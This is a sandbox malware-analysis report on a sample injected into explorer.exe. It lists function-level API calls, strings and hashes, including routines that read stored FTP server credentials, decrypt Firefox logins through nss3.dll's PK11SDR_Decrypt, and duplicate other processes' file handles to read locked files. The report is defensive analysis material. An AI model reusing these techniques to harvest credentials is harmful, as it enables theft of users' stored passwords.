                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                            • API String ID: 1279760036-667713680
                                                                                                                            • Opcode ID: bf51ed5dc28e2c5015eb164a600b4904d16f840817b1dfb19a020fe8bd611539
                                                                                                                            • Instruction ID: 0551b5b1d8191fa4f4d9f3370da66dc03010a84e56b9dfb570d933922bc5f580
                                                                                                                            • Opcode Fuzzy Hash: bf51ed5dc28e2c5015eb164a600b4904d16f840817b1dfb19a020fe8bd611539
                                                                                                                            • Instruction Fuzzy Hash: DBE0C2776082117BC2222794AC05F2FB768EBA8F50F150037FA00A26B0C2B8DC0187AA
                                                                                                                            Function 00439EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(04CB0000,00000000,?), ref: 00439EF8
                                                                                                                            Strings
                                                                                                                            • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00439F0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                            • API String ID: 3298025750-4030396798
                                                                                                                            • Opcode ID: ca53e07b40ff8a631e016933696b89010de0571b60cadc6d8d0019ce1dbb1901
                                                                                                                            • Instruction ID: 5f80be317e21cce8f094aec7d8abf2be8a6a435f0bcba425abd992bf3b123478
                                                                                                                            • Opcode Fuzzy Hash: ca53e07b40ff8a631e016933696b89010de0571b60cadc6d8d0019ce1dbb1901
                                                                                                                            • Instruction Fuzzy Hash: A5D0C27310820177C3102B509C01F3F7738AFA8B00F04043BF21091175C2B89840AB6D
                                                                                                                            Function 00431B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3498533004-0
                                                                                                                            • Opcode ID: bd29e5d7c0f63967d2a91a6c65664367067c9d4455676ac7d3552c95f08f7f35
                                                                                                                            • Instruction ID: 5789d7cd6e24c7bc6b24fb9a2dc4514b16513a98844a6f4d48f25c84bfd42507
                                                                                                                            • Opcode Fuzzy Hash: bd29e5d7c0f63967d2a91a6c65664367067c9d4455676ac7d3552c95f08f7f35
                                                                                                                            • Instruction Fuzzy Hash: 14D0127125363062D5B557357C0CEABAE1CDF076B5F050A25B51DD91E1E2189C8782E8
                                                                                                                            Function 00431011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0043116F
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580854192-0
                                                                                                                            • Opcode ID: 3c24d6c787b04d5b3ce9f73348c8e9acc572de3f80428b95906996088c581c1e
                                                                                                                            • Instruction ID: 466a28dcb9207cbeda36715575463fb0f31d55aad8d1e8272c8899010e5ec0f5
                                                                                                                            • Opcode Fuzzy Hash: 3c24d6c787b04d5b3ce9f73348c8e9acc572de3f80428b95906996088c581c1e
                                                                                                                            • Instruction Fuzzy Hash: 39C08C3100022052C9A02BA03C0CBCF2B1ACF0D322F02085AB90197263CA698C4183A8
                                                                                                                            Function 00431000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: bb9f95b2706471de0f2ba9de71f283c28a52f394edfbdcdc45cc1c247f8c3644
                                                                                                                            • Instruction ID: 787d245fb9655365faefe1cbd4fba9effdba40b613877560947bc4d7a19650dd
                                                                                                                            • Opcode Fuzzy Hash: bb9f95b2706471de0f2ba9de71f283c28a52f394edfbdcdc45cc1c247f8c3644
                                                                                                                            • Instruction Fuzzy Hash: D7A002755501045BDD845BA49E4DA1E3519F744702F114958754586053D96454048725
                                                                                                                            Function 004312A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000018), ref: 004312B5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryZero
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 816449071-0
                                                                                                                            • Opcode ID: af48dd5e402ec486cb4fa509ddbe2b674e330584176a2a1f566f9359c9d4a5cb
                                                                                                                            • Instruction ID: 5ade35cb5213dba85017e0bc9578c55474da29059dd4270e44ca2c88fcba699d
                                                                                                                            • Opcode Fuzzy Hash: af48dd5e402ec486cb4fa509ddbe2b674e330584176a2a1f566f9359c9d4a5cb
                                                                                                                            • Instruction Fuzzy Hash: E311F8B1A01209AFDB50DFA5D988AAFB7BCEB08741F10442AF945E7251D734DD01CB68
                                                                                                                            Function 00431B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00432C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00431BAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 29f40640e66eaeead4d2f74a220b9a99a05c2f2a2a2cad5e31793062cc2aea99
                                                                                                                            • Instruction ID: b693558cb1f35c50d0c808c9f70e4ee0c3361309c7449f4fc5c04912652c963b
                                                                                                                            • Opcode Fuzzy Hash: 29f40640e66eaeead4d2f74a220b9a99a05c2f2a2a2cad5e31793062cc2aea99
                                                                                                                            • Instruction Fuzzy Hash: 46D0A733D0243042896456343C04857E1445A0577471B0775FC25F32E0E228DC8243C8
                                                                                                                            Function 00431677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00431684
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2244384528-0
                                                                                                                            • Opcode ID: 05f25da1cbb2d5891a4e47ee756b5c67aa094baf3c2920428fa212332c42acdc
                                                                                                                            • Instruction ID: c81a99ab08c7f8712347e7db531447aab7e0122f9b54079b80138b8069807361
                                                                                                                            • Opcode Fuzzy Hash: 05f25da1cbb2d5891a4e47ee756b5c67aa094baf3c2920428fa212332c42acdc
                                                                                                                            • Instruction Fuzzy Hash: 8DC012301202219FE7602A608C0AB8A26D4AF197A2F0619AAA0859D090E2A808C08A94
                                                                                                                            Function 0043104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0043158A), ref: 00431056
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 7b37b37bd7d0c94f66ebc6f685c31fe765d24cd3d08a98ba3b2c5cd90fde1851
                                                                                                                            • Instruction ID: 3035af6bfdf8d380f5ac43a5eb8c7f016089f06affd869601e7dba3012b447ff
                                                                                                                            • Opcode Fuzzy Hash: 7b37b37bd7d0c94f66ebc6f685c31fe765d24cd3d08a98ba3b2c5cd90fde1851
                                                                                                                            • Instruction Fuzzy Hash: D2A002F07D53007AFDA997A2AE1FF1929389741F02F110658B30D7C0D056E57500862D
                                                                                                                            Function 0043105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00434A5B,?,?,00000000,?,?,?,?,00434B66,?), ref: 00431065
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 89ab71ac070360565af09993e5ad2fd24c2a2e0f2080eb04729c32744004c38b
                                                                                                                            • Instruction ID: 44aa8079cca54ab86f571b86f5cedd974066a2b77ab06bfd82e7a1c26f315ffd
                                                                                                                            • Opcode Fuzzy Hash: 89ab71ac070360565af09993e5ad2fd24c2a2e0f2080eb04729c32744004c38b
                                                                                                                            • Instruction Fuzzy Hash: E0A0027069070066EDF45B205D0EF0926156740B01F2149587641AD0D249A5E0448B1C

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0043349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 004334C0
                                                                                                                              • Part of subcall function 004333C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00433401
                                                                                                                            • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 004334E9
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0043351E
                                                                                                                            • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00433541
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00433586
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0043358F
                                                                                                                            • lstrcmpiW.KERNEL32(00000000,File), ref: 004335B6
                                                                                                                            • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 004335DE
                                                                                                                            • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 004335F6
                                                                                                                            • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00433606
                                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0043361E
                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00433631
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00433658
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0043366B
                                                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00433681
                                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004336AD
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004336C0
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 004336F5
                                                                                                                              • Part of subcall function 00431C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CC0
                                                                                                                              • Part of subcall function 00431C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CDA
                                                                                                                              • Part of subcall function 00431C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00431CE6
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004337A8), ref: 00433707
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                            • String ID: File
                                                                                                                            • API String ID: 3915112439-749574446
                                                                                                                            • Opcode ID: 2131a2303e721dfae2174c6bd9b6d26caca89b65fabeae345ffcf0fd2ed382b2
                                                                                                                            • Instruction ID: 44a0c8185f7fd8acd06a206b58f9a9064254d1b3ce0e4d5e5d7d9e13e6c0d445
                                                                                                                            • Opcode Fuzzy Hash: 2131a2303e721dfae2174c6bd9b6d26caca89b65fabeae345ffcf0fd2ed382b2
                                                                                                                            • Instruction Fuzzy Hash: 6E61A070204300BFD760AF21CC89F2F7BE9EB88756F10192DF946963A1D779DA448B59
                                                                                                                            Function 00484438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00484502
                                                                                                                            • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0048475F
                                                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00484803
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp$memcpy
                                                                                                                            • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                            • API String ID: 231171946-1096842476
                                                                                                                            • Opcode ID: 04a69ccf047413bb2107c853bfc65e2737904645a85727e66eda4176b3b390b1
                                                                                                                            • Instruction ID: f9cb84a6d7bdab28ce42f23e2e95cdad0568f83e3312e7cb6ac1390aa6dd0e2b
                                                                                                                            • Opcode Fuzzy Hash: 04a69ccf047413bb2107c853bfc65e2737904645a85727e66eda4176b3b390b1
                                                                                                                            • Instruction Fuzzy Hash: 3EC1D170A083539BDB34AE18849172FB7D1ABDA318F140D2FE4D597352E72C9845875E
                                                                                                                            Function 00455F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00436AAA: memset.NTDLL ref: 00436AC5
                                                                                                                            • memset.NTDLL ref: 00455F53
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                            • API String ID: 2221118986-594550510
                                                                                                                            • Opcode ID: 7e1712b6b048669f37cd20d3946d9390c2fc274e3b7fcc62b60d0141213af27a
                                                                                                                            • Instruction ID: 58600f9d49a2d4cf012793eb93f52d2e1654d9b299c31ced64b813b859bf2337
                                                                                                                            • Opcode Fuzzy Hash: 7e1712b6b048669f37cd20d3946d9390c2fc274e3b7fcc62b60d0141213af27a
                                                                                                                            • Instruction Fuzzy Hash: 9BC18D70604702AFDB14DF25C480A2FB7E2BF88715F55891EF84487382DB39D95ACB9A
                                                                                                                            Function 00434440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.COMBASE(004862B0,00000000,00000001,004862A0,?), ref: 0043445F
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004344AA
                                                                                                                            • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0043456E
                                                                                                                            • lstrcmpiW.KERNEL32(Servers,?), ref: 0043457D
                                                                                                                            • lstrcmpiW.KERNEL32(Settings,?), ref: 0043458C
                                                                                                                              • Part of subcall function 004311E1: lstrlenW.KERNEL32(?,7622F360,00000000,?,00000000,?,004346E3), ref: 004311ED
                                                                                                                              • Part of subcall function 004311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0043120F
                                                                                                                              • Part of subcall function 004311E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00431231
                                                                                                                            • lstrcmpiW.KERNEL32(Server,?), ref: 004345BE
                                                                                                                            • lstrcmpiW.KERNEL32(LastServer,?), ref: 004345CD
                                                                                                                            • lstrcmpiW.KERNEL32(Host,?), ref: 00434657
                                                                                                                            • lstrcmpiW.KERNEL32(Port,?), ref: 00434679
                                                                                                                            • lstrcmpiW.KERNEL32(User,?), ref: 0043469F
                                                                                                                            • lstrcmpiW.KERNEL32(Pass,?), ref: 004346C5
                                                                                                                            • wsprintfW.USER32 ref: 0043471E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                            • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                            • API String ID: 2230072276-1234691226
                                                                                                                            • Opcode ID: 445fdfdd74574c051e3f5cc9fff04f89ba264ec1822ded7891338a5ccfd602e3
                                                                                                                            • Instruction ID: fc015ca3d079c8d6687890a0cde6a1c3ad820aae2fc8187c7f07a69e09f70ee7
                                                                                                                            • Opcode Fuzzy Hash: 445fdfdd74574c051e3f5cc9fff04f89ba264ec1822ded7891338a5ccfd602e3
                                                                                                                            • Instruction Fuzzy Hash: 99B13771204302AFD740EF64C884E6BB7E9EFC9745F10896DF5898B260DB75E806CB66
                                                                                                                            Function 004324B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                              • Part of subcall function 00431090: lstrlenW.KERNEL32(?,?,00000000,004317E5), ref: 00431097
                                                                                                                              • Part of subcall function 00431090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 004310A8
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00432503
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0043250A
                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00432563
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00432570
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00432591
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0043259E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 004325AB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 004325B8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 004325C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 004325D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 004325DF
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,?), ref: 00431946
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                            • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                            • API String ID: 3366569387-3272982511
                                                                                                                            • Opcode ID: 6865bc11f9eacc8933397781955599f24cd4f5a09cfd97a25eedc8d2804fb567
                                                                                                                            • Instruction ID: 753c51c42b55634c5d4287b89258724039da9c1493972456a729716819324d94
                                                                                                                            • Opcode Fuzzy Hash: 6865bc11f9eacc8933397781955599f24cd4f5a09cfd97a25eedc8d2804fb567
                                                                                                                            • Instruction Fuzzy Hash: B8410331A0030A9BDB54AF3A9E5562F3AE59F99748F11143FE84297371DBBC8C018B9D
                                                                                                                            Function 00435E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00435BF5: memset.NTDLL ref: 00435C07
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 004360E1
                                                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 004360EC
                                                                                                                            • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00436113
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0043618E
                                                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 004361B5
                                                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 004361C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _alldiv$_allrem$memset
                                                                                                                            • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                            • API String ID: 2557048445-1989508764
                                                                                                                            • Opcode ID: 6838eb774acee03fdc61f72175e8385728d27d7d0506a67c4e2a79b1301d0e7e
                                                                                                                            • Instruction ID: 483606aa9446f118c68cecef693c4a1161df0e468cba1e03fe9aa8361dcca53f
                                                                                                                            • Opcode Fuzzy Hash: 6838eb774acee03fdc61f72175e8385728d27d7d0506a67c4e2a79b1301d0e7e
                                                                                                                            • Instruction Fuzzy Hash: B4B16DB1908743BBD725AE24CC85B3F7BD4EB48304F26599FF48296291E62DCD10869E
                                                                                                                            Function 0044D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcmp.NTDLL(0048637A,BINARY,00000007), ref: 0044D324
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                            • API String ID: 1475443563-3683840195
                                                                                                                            • Opcode ID: 43d3fa34c364d3cef5b3b670fb0bf67fde962dfece147ac1f52f1bb0b0bc8a8b
                                                                                                                            • Instruction ID: 525abce94267dc91e76fb2546ff742aa0580dc85ab486492084eecd6fa6459a3
                                                                                                                            • Opcode Fuzzy Hash: 43d3fa34c364d3cef5b3b670fb0bf67fde962dfece147ac1f52f1bb0b0bc8a8b
                                                                                                                            • Instruction Fuzzy Hash: C751C071A08700ABE720EF65CC41B6B73E5AB49700F644C6FF9928B251D77CE805C79A
                                                                                                                            Function 004348B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
